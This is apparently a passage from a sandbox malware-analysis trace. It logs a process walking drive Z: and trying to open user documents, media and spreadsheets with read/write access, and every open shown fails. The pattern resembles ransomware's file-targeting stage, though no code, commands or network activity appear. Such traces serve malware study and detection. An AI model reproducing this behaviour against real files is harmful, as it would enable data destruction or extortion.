[0182.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.724] PathFindExtensionW (pszPath="Z:\\U04chup9Htp9GaipvVKU.mp3") returned=".mp3" [0182.728] CreateFileW (lpFileName="Z:\\U04chup9Htp9GaipvVKU.mp3" (normalized: "z:\\u04chup9htp9gaipvvku.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.776] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.776] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb8d73a, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265d8c3a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb8d73a, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11bd5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TSC3rM0mAZRze.gif", cAlternateFileName="")) returned 1 [0182.776] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.776] PathFindExtensionW (pszPath="Z:\\TSC3rM0mAZRze.gif") returned=".gif" [0182.782] CreateFileW (lpFileName="Z:\\TSC3rM0mAZRze.gif" (normalized: "z:\\tsc3rm0mazrze.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.785] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265c53b9, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd97e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NoWCllIvB.mp4", cAlternateFileName="")) returned 1 [0182.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.785] PathFindExtensionW (pszPath="Z:\\NoWCllIvB.mp4") returned=".mp4" [0182.792] CreateFileW (lpFileName="Z:\\NoWCllIvB.mp4" (normalized: "z:\\nowcllivb.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.794] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xe2cd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BJt1dICMT7jI.odt", cAlternateFileName="")) returned 1 [0182.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.794] PathFindExtensionW (pszPath="Z:\\BJt1dICMT7jI.odt") returned=".odt" [0182.800] CreateFileW (lpFileName="Z:\\BJt1dICMT7jI.odt" (normalized: "z:\\bjt1dicmt7ji.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.802] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2667ec80, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x115fd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bRONRhxfJSt.mkv", cAlternateFileName="")) returned 1 [0182.802] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.802] PathFindExtensionW (pszPath="Z:\\bRONRhxfJSt.mkv") returned=".mkv" [0182.808] CreateFileW (lpFileName="Z:\\bRONRhxfJSt.mkv" (normalized: "z:\\bronrhxfjst.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.809] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.809] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xa9c3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mkCTvFrcP2kSnJz4.csv", cAlternateFileName="")) returned 1 [0182.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.809] PathFindExtensionW (pszPath="Z:\\mkCTvFrcP2kSnJz4.csv") returned=".csv" [0182.815] CreateFileW (lpFileName="Z:\\mkCTvFrcP2kSnJz4.csv" (normalized: "z:\\mkctvfrcp2ksnjz4.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.817] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.817] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17c72, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="yFhoJ6DLxdB.gif", cAlternateFileName="")) returned 1 [0182.817] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.817] PathFindExtensionW (pszPath="Z:\\yFhoJ6DLxdB.gif") returned=".gif" [0182.822] CreateFileW (lpFileName="Z:\\yFhoJ6DLxdB.gif" (normalized: "z:\\yfhoj6dlxdb.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.824] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbaabff, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbaabff, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd8b1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fSdZCoMsu.ppt", cAlternateFileName="")) returned 1 [0182.824] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.824] PathFindExtensionW (pszPath="Z:\\fSdZCoMsu.ppt") returned=".ppt" [0182.830] CreateFileW (lpFileName="Z:\\fSdZCoMsu.ppt" (normalized: "z:\\fsdzcomsu.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.835] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x90fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="qMEqdumGg.xls", cAlternateFileName="")) returned 1 [0182.836] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.836] PathFindExtensionW (pszPath="Z:\\qMEqdumGg.xls") returned=".xls" [0182.843] CreateFileW (lpFileName="Z:\\qMEqdumGg.xls" (normalized: "z:\\qmeqdumgg.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.844] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26559cf6, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xecf9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6bvEhs8ikEXo7i7VwC.odp", cAlternateFileName="")) returned 1 [0182.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.845] PathFindExtensionW (pszPath="Z:\\6bvEhs8ikEXo7i7VwC.odp") returned=".odp" [0182.849] CreateFileW (lpFileName="Z:\\6bvEhs8ikEXo7i7VwC.odp" (normalized: "z:\\6bvehs8ikexo7i7vwc.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.851] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265c53b9, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x134b1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NDQzoX6pBA3xcoCD4T.pdf", cAlternateFileName="")) returned 1 [0182.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.851] PathFindExtensionW (pszPath="Z:\\NDQzoX6pBA3xcoCD4T.pdf") returned=".pdf" [0182.855] CreateFileW (lpFileName="Z:\\NDQzoX6pBA3xcoCD4T.pdf" (normalized: "z:\\ndqzox6pba3xcocd4t.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.856] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x8c67, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="r0UXmiC.bmp", cAlternateFileName="")) returned 1 [0182.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0182.856] PathFindExtensionW (pszPath="Z:\\r0UXmiC.bmp") returned=".bmp" [0182.861] CreateFileW (lpFileName="Z:\\r0UXmiC.bmp" (normalized: "z:\\r0uxmic.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.863] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0182.863] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265ec4bb, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x99c8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YsUSMSG.odt", cAlternateFileName="")) returned 1 [0182.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0182.863] PathFindExtensionW (pszPath="Z:\\YsUSMSG.odt") returned=".odt" [0182.867] CreateFileW (lpFileName="Z:\\YsUSMSG.odt" (normalized: "z:\\ysusmsg.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.868] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0182.868] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1494d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nHAn9S5wXFCiA.avi", cAlternateFileName="")) returned 1 [0182.868] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.868] PathFindExtensionW (pszPath="Z:\\nHAn9S5wXFCiA.avi") returned=".avi" [0182.873] CreateFileW (lpFileName="Z:\\nHAn9S5wXFCiA.avi" (normalized: "z:\\nhan9s5wxfcia.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.874] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.874] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb52db1, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb52db1, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x901e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3w8tH1dj3.avi", cAlternateFileName="")) returned 1 [0182.874] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.874] PathFindExtensionW (pszPath="Z:\\3w8tH1dj3.avi") returned=".avi" [0182.879] CreateFileW (lpFileName="Z:\\3w8tH1dj3.avi" (normalized: "z:\\3w8th1dj3.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.881] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.881] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb83af9, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265c53b9, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb83af9, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x15a57, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OCrMyD.gif", cAlternateFileName="")) returned 1 [0182.881] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0182.881] PathFindExtensionW (pszPath="Z:\\OCrMyD.gif") returned=".gif" [0182.885] CreateFileW (lpFileName="Z:\\OCrMyD.gif" (normalized: "z:\\ocrmyd.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.886] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0182.886] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x96e6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CO3BSlwl0AGjF6ik7YUj.ods", cAlternateFileName="")) returned 1 [0182.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.886] PathFindExtensionW (pszPath="Z:\\CO3BSlwl0AGjF6ik7YUj.ods") returned=".ods" [0182.890] CreateFileW (lpFileName="Z:\\CO3BSlwl0AGjF6ik7YUj.ods" (normalized: "z:\\co3bslwl0agjf6ik7yuj.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.891] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.891] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd2b6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8Zpef8RfCY9KqCV7PE.avi", cAlternateFileName="")) returned 1 [0182.892] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0182.892] PathFindExtensionW (pszPath="Z:\\8Zpef8RfCY9KqCV7PE.avi") returned=".avi" [0182.895] CreateFileW (lpFileName="Z:\\8Zpef8RfCY9KqCV7PE.avi" (normalized: "z:\\8zpef8rfcy9kqcv7pe.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.901] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0182.901] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xe944, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ad6eYrGeF6ADM39N.odt", cAlternateFileName="")) returned 1 [0182.901] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.901] PathFindExtensionW (pszPath="Z:\\Ad6eYrGeF6ADM39N.odt") returned=".odt" [0182.905] CreateFileW (lpFileName="Z:\\Ad6eYrGeF6ADM39N.odt" (normalized: "z:\\ad6eyrgef6adm39n.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.906] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.907] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb9737c, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265e287a, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb9737c, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd0a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TtGiLOV0AbV.jpg", cAlternateFileName="")) returned 1 [0182.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0182.907] PathFindExtensionW (pszPath="Z:\\TtGiLOV0AbV.jpg") returned=".jpg" [0182.911] CreateFileW (lpFileName="Z:\\TtGiLOV0AbV.jpg" (normalized: "z:\\ttgilov0abv.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.912] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0182.912] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x12d87, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rIxvZBz.mp4", cAlternateFileName="")) returned 1 [0182.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0182.912] PathFindExtensionW (pszPath="Z:\\rIxvZBz.mp4") returned=".mp4" [0182.917] CreateFileW (lpFileName="Z:\\rIxvZBz.mp4" (normalized: "z:\\rixvzbz.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.919] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0182.919] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266d6ac3, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xee59, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ywVBC9F7.mkv", cAlternateFileName="")) returned 1 [0182.919] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0182.919] PathFindExtensionW (pszPath="Z:\\ywVBC9F7.mkv") returned=".mkv" [0182.923] CreateFileW (lpFileName="Z:\\ywVBC9F7.mkv" (normalized: "z:\\ywvbc9f7.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0182.924] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x78b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EWYXiU.png", cAlternateFileName="")) returned 1 [0182.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0182.925] PathFindExtensionW (pszPath="Z:\\EWYXiU.png") returned=".png" [0182.929] CreateFileW (lpFileName="Z:\\EWYXiU.png" (normalized: "z:\\ewyxiu.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 